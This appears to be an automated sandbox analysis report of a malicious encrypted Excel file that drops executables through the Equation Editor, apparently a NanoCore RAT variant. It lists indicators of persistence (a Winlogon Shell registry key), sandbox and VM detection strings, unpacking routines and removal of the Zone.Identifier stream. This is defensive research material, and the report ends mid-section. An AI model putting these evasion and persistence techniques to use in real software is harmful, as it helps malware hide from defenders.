Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Ref 0180066743.xlsx

Static file information: File size 1250304 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: j,C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
Source:	Binary string: *:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367318598.0000000005404000.00000004.00000001.sdmp
Source:	Binary string: inC:\Windows\System.pdb *{ source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, RegAsm.exe.4.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp

Source: Ref 0180066743.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Ref 0180066743.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: new[1].exe.2.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: win33.exe.4.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.df0000.3.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.df0000.0.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2207997590.0000000000DF2000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.2148408702.0000000000DF2000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208071587.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\win33.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe, type: DROPPED
Source: Yara match	File source: 4.2.vbc.exe.df0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.df0000.0.unpack, type: UNPACKEDPE

Source: C:\Users\Public\vbc.exe	Code function: 4_2_04A0367C push edi; retf	4_2_04A0367D
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_003C523F push cs; iretd	5_2_003C5240
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_00CD3D8A push dword ptr [esp+ecx-75h]; iretd	5_2_00CD3D8E

Source: initial sample	Static PE information: section name: .text entropy: 7.98582259438
Source: initial sample	Static PE information: section name: .text entropy: 7.98582259438

Source: new[1].exe.2.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	High entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
Source: new[1].exe.2.dr, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.cs	High entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
Source: win33.exe.4.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	High entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
Source: win33.exe.4.dr, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.cs	High entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
Source: 4.2.vbc.exe.df0000.3.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	High entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
Source: 4.2.vbc.exe.df0000.3.unpack, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.cs	High entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
Source: 4.0.vbc.exe.df0000.0.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs	High entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
Source: 4.0.vbc.exe.df0000.0.unpack, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.cs	High entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\win33.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\Public\vbc.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Jump to behavior

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe

File opened: C:\Users\user\AppData\Local\Temp\RegAsm.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Ref 0180066743.xlsx

Stream path 'EncryptedPackage' entropy: 7.99983137636 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Window / User API: threadDelayed 7692	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Window / User API: threadDelayed 1664	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Window / User API: foregroundWindowGot 379	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2572	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2840	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 1772	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

